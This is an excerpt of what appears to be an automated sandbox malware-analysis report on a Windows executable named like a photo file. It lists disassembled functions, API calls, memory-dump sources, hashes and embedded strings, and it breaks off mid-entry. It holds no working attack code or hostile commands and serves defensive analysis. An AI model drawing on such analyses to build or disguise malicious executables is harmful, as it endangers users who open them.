                                                                • Instruction ID: 6cbd9096b8002320997c47e54d960ee50c40d347d69033938e4e09d4f14cdeb4
                                                                • Opcode Fuzzy Hash: f59710ccd44d494c6e3061a8ec2ff61b526064ffaa5f7f94af53b445760d1d11
                                                                • Instruction Fuzzy Hash: 05017B72D0011967C711FEA99C449EFF7F8AF85364F040B2AE80593241E7749A08C3E5
                                                                Function 0042258A Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __fassign$wcstoxl
                                                                • String ID:
                                                                • API String ID: 3403923588-0
                                                                • Opcode ID: e2e836694439390d2e4112b24c68fe72a73f3ee0ffecf6b5def8a7e8f540cce8
                                                                • Instruction ID: d1fdd921b67e1404214137c15033a3929ea855002cf44d141839c5981be80f82
                                                                • Opcode Fuzzy Hash: e2e836694439390d2e4112b24c68fe72a73f3ee0ffecf6b5def8a7e8f540cce8
                                                                • Instruction Fuzzy Hash: 7901ADF2D10129AADB20DA59DD51AEEB3B8FB84308F4455EAE608F6101D6345F44CF69
                                                                Function 0247B4CC Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 0247B4E6
                                                                  • Part of subcall function 0247AC8F: __FF_MSGBANNER.LIBCMT ref: 0247ACA8
                                                                  • Part of subcall function 0247AC8F: __NMSG_WRITE.LIBCMT ref: 0247ACAF
                                                                  • Part of subcall function 0247AC8F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0247ACD4
                                                                • std::exception::exception.LIBCMT ref: 0247B51B
                                                                • std::exception::exception.LIBCMT ref: 0247B535
                                                                • __CxxThrowException@8.LIBCMT ref: 0247B546
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                • String ID:
                                                                • API String ID: 615853336-0
                                                                • Opcode ID: e5c4b8db9ad2f9204201c840d5c8d85f97d53c1a96168afad4049c9aba9b0e4e
                                                                • Instruction ID: ec08a7eeec7f6d621a29266b0b2050ba46c10d27daa748dfda0e55ea5bd85333
                                                                • Opcode Fuzzy Hash: e5c4b8db9ad2f9204201c840d5c8d85f97d53c1a96168afad4049c9aba9b0e4e
                                                                • Instruction Fuzzy Hash: 22F0F431400319BBDB10EB66CC84AED3B6BFB40718F50016FF424AB190DB74CA868B80
                                                                Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00401027
                                                                • TranslateMessage.USER32(?), ref: 00401035
                                                                • DispatchMessageW.USER32(?), ref: 0040103F
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040104C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Message$Translate$AcceleratorDispatch
                                                                • String ID:
                                                                • API String ID: 2755951552-0
                                                                • Opcode ID: d6680d08e1aa9b579bfeebb63256a4e8d530dad26fec4ebd9332e9cf5d95b239
                                                                • Instruction ID: 9b56a7c98a44f4ee2f0629dd3cb05ce9dde8c1074f6cb2634173cdb9e13e1bbb
                                                                • Opcode Fuzzy Hash: d6680d08e1aa9b579bfeebb63256a4e8d530dad26fec4ebd9332e9cf5d95b239
                                                                • Instruction Fuzzy Hash: F5F06272D0021EABCF10AFA5DC48CEFBBBDEF45750B004426E502E2554D6389546DBB2
                                                                Function 004AAFEB Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(0062FD00,00000000,00000000,?,00403486,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004AAFF8
                                                                • LeaveCriticalSection.KERNEL32(0062FD00,?,00403486,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004AB014
                                                                • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00403486,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004AB033
                                                                • LeaveCriticalSection.KERNEL32(0062FD00,?,00403486,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004AB03A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$EnterExceptionRaise
                                                                • String ID:
                                                                • API String ID: 799838862-0
                                                                • Opcode ID: ea85e447931cad9d6557dc2dfa3d4a53c12e2cac288523fcde1c300ba45cd7a7
                                                                • Instruction ID: ff0f0022e896909dcc6ce93eedd08345df52c87a9ea3029099f2333835bfcd2a
                                                                • Opcode Fuzzy Hash: ea85e447931cad9d6557dc2dfa3d4a53c12e2cac288523fcde1c300ba45cd7a7
                                                                • Instruction Fuzzy Hash: E2F09636304200ABD7306B55EC44BAB77B4EBBB711F10041EF613D7A41C764B806D7A5
                                                                Function 00403528 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0040352F
                                                                • SysFreeString.OLEAUT32(00000000), ref: 00403543
                                                                  • Part of subcall function 00403473: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,7529E860,?,?,0040354D,?,?,00000044,004011FD), ref: 004034AA
                                                                  • Part of subcall function 00403473: LoadResource.KERNEL32(00000000,00000000,?,?,0040354D,?,?,00000044,004011FD), ref: 004034B8
                                                                • SysAllocStringLen.OLEAUT32(-00000002,?), ref: 0040355A
                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040356F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: String$FreeResource$AllocFindH_prolog3Load
                                                                • String ID:
                                                                • API String ID: 3828113827-0
                                                                • Opcode ID: e518642cdf41bb37a7a294e99334248c80d31ce20113e4b90330f29e9e182238
                                                                • Instruction ID: 87db9c1e8ce7ffc1f0bb8eeaef0f66215487facc8b7b384641d2630f66851bd0
                                                                • Opcode Fuzzy Hash: e518642cdf41bb37a7a294e99334248c80d31ce20113e4b90330f29e9e182238
                                                                • Instruction Fuzzy Hash: 90F0A7B1400114ABCF01BF6ACC4197EBFF8AF81701B10441FF100D7270C7BC8A019654
                                                                Function 0040F7DA Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 0040F7DC
                                                                  • Part of subcall function 0040D5DF: __EH_prolog3.LIBCMT ref: 0040D5E6
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ErrorLast
                                                                • String ID: Updater\Updater.cpp$[UM] post message failed:%u$[UM] post_message failed:%u
                                                                • API String ID: 1123136255-3610341259
                                                                • Opcode ID: 4d0a09944dd062fb5af7ba63c53327146239e1479116bb02e1167c2ecd38aaff
                                                                • Instruction ID: 5fb3bc5965c5d1c196a7432d9e86c63e6f454b2d06c9733fd267731d69b854cc
                                                                • Opcode Fuzzy Hash: 4d0a09944dd062fb5af7ba63c53327146239e1479116bb02e1167c2ecd38aaff
                                                                • Instruction Fuzzy Hash: 27E0482064025477D5202761DC0FF573F28AFC2B5DF04446DB709EF1E1D9794C42C565
                                                                Function 004857D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Missing ',' or ']' in array declaration, xrefs: 004859F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Missing ',' or ']' in array declaration
                                                                • API String ID: 0-1780669529
                                                                • Opcode ID: dcc33f8b2146c99355a4e6397b4f5a789830e876e747bcf41b45c60251bfaf84
                                                                • Instruction ID: 216a44fc38142b623c8bf870375600787ec1eb140368aa2e4739b7dd11fcfeb6
                                                                • Opcode Fuzzy Hash: dcc33f8b2146c99355a4e6397b4f5a789830e876e747bcf41b45c60251bfaf84
                                                                • Instruction Fuzzy Hash: 1F91CEB0A00B04CBDB24FFA9C490BAEB7B6AF45314F14491FD4569B381DB78A905CB99
                                                                Function 00459410 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: invalid vector<T> subscript$Ec
                                                                • API String ID: 0-2585911554
                                                                • Opcode ID: 750bee9d4e631085e23e495495f5f0db32354f3b8dde054cb01c17ea42c19ae9
                                                                • Instruction ID: 7deb396da9b5ee1c9221ee9c01c35074a7430609edddcbf979312949ae20d2a2
                                                                • Opcode Fuzzy Hash: 750bee9d4e631085e23e495495f5f0db32354f3b8dde054cb01c17ea42c19ae9
                                                                • Instruction Fuzzy Hash: 7581A271900208DFCB04FFA5C845BEDB7B5BF05319F54495EE81667282EB386E09CB95
                                                                Function 00451E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strlen.LIBCMT ref: 00451F4C
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _malloc_strlen
                                                                • String ID: Content-Type:application/json;charset=utf-8$util\Statistic.cpp
                                                                • API String ID: 1889909783-2700395006
                                                                • Opcode ID: 542e81241afa1b9d37741d2580804520d324d2315c2a02961f00abca71a1d37a
                                                                • Instruction ID: 6f9fa498e550bf6bcb7582b2cc6e434ab8bc09726db6a157a2213d2fa8f4c943
                                                                • Opcode Fuzzy Hash: 542e81241afa1b9d37741d2580804520d324d2315c2a02961f00abca71a1d37a
                                                                • Instruction Fuzzy Hash: 65710871D00245EFDF04EFA4D985BDEBBB1AF01309F14446FE91227282D7B96648CB9A
                                                                Function 0044F690 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strlen.LIBCMT ref: 0044F75E
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _malloc_strlen
                                                                • String ID: Content-Type:application/json;charset=utf-8$logger\BigDataLog.cpp
                                                                • API String ID: 1889909783-395739322
                                                                • Opcode ID: cca9c8bc39927bcfd0338bd276e361ff7c31458d00d94ed5c4ca6016fd0813c5
                                                                • Instruction ID: 7f652915d017b3b46167fce58035f2a62f70a3c61d5181eb9ccebbe426c4a626
                                                                • Opcode Fuzzy Hash: cca9c8bc39927bcfd0338bd276e361ff7c31458d00d94ed5c4ca6016fd0813c5
                                                                • Instruction Fuzzy Hash: 5871F770D00349EFEF04EFA4C852BDEBB75AF05304F14856EE41567292D7785A08CB9A
                                                                Function 00482BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 00482C9F
                                                                • __CxxThrowException@8.LIBCMT ref: 00482CB4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID: [-H
                                                                • API String ID: 4063778783-3347417870
                                                                • Opcode ID: f47f62c52fd809a883087ade6ac2c1adca32c421b111f35e0ad0151d617594ca
                                                                • Instruction ID: 8a4f58f1b300afc232cb5349a898efe6f157e6bcf0e02bc954d946a5ebff0d31
                                                                • Opcode Fuzzy Hash: f47f62c52fd809a883087ade6ac2c1adca32c421b111f35e0ad0151d617594ca
                                                                • Instruction Fuzzy Hash: FE51D3B1A00204AFD710EF59C940B9EBBF4EB49710F14896FE819D7381D7B8A905CB65
                                                                Function 0044D1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00401A8E: std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                • GetFileAttributesW.KERNEL32(?,00000000,000000FF,3D09168B,0000002C,?,00000000,?,?,?,?,?,?,00000000,0059ED68,000000FF), ref: 0044D208
                                                                • _memmove.LIBCMT ref: 0044D268
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AttributesFileXinvalid_argument_memmovestd::_
                                                                • String ID: %s\zmtest_%d.dyzm
                                                                • API String ID: 1892982390-486084305
                                                                • Opcode ID: b3a34367fa177d6d3ab58048c37d082351dbcf50ab84f05d468d363f77295afa
                                                                • Instruction ID: 501b4a896f45a7f495021d518e94306c6379d7e5ba4683c27982520b3ecaf3e7
                                                                • Opcode Fuzzy Hash: b3a34367fa177d6d3ab58048c37d082351dbcf50ab84f05d468d363f77295afa
                                                                • Instruction Fuzzy Hash: D05182B1D002089BDF10DFA9D8819EEF7B5FF59304F10892FE41663240E739A945CB96
                                                                Function 0040863A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(?,0040439A), ref: 0040873A
                                                                Strings
                                                                • %d%%, xrefs: 004087B2
                                                                • file='progress_fore.png' source='0,10,470,16' dest='0,0,%d,6' , xrefs: 0040880E
                                                                Memory Dump Source
